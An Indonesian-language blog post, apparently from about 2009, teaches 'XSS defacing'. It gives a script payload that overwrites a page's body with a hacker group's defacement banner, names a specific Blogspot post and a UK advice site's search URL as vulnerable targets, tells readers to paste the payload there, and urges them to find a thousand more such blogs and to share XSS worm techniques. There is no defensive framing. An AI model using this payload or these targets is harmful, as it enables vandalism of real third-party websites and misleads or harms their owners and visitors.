XSS Defacing for Blogspot or Some Website
Copy dulu script berikut ini
:
<script>document.body.innerHTML="<h1>XSS
Defacing</h1>This Site Has XSSed By : Typicore
XecureIT<br/>Greetz To : syndrom2211 , insyde2211 , bubud007 , and
all member Typicore XecureIT <br/>Visit http://typicore-xecure.alinux.ru/";</script>
Coba buka blog orang ini : http://f4123n.blogspot.com/2009/01/pengenalan-sistem-komputer-device.html Kemudian
akan muncul messagebox, dimana kita disuruh masukin nama Nah paste
kodenya di situ & klik ok Jreng... Jreng... Jreng...
Nah tinggal dicari dech 1000 Blog yang ada kayak begitunya
Tadi khan Blog, sekarang kita beralih ke Web, Nah gw tadi dapet
beberapa Web yang Vulner XSS Rata-rata Vulnernya di bagian "Search
Enginenya", mayan khan bisa buat coba-coba XSS Defacing
Nih contohnya : http://www.advicenow.org.uk/search.html?q=<Paste Scriptnya yang di atas Disini & Tekan Enter>
Oke silahkan ditambahkan noh, apalagi yang mengenai XSS Worm (Kalo ngartos jangan pelit2)
sumber : http://www.xcode.or.id
Tidak ada komentar:
Posting Komentar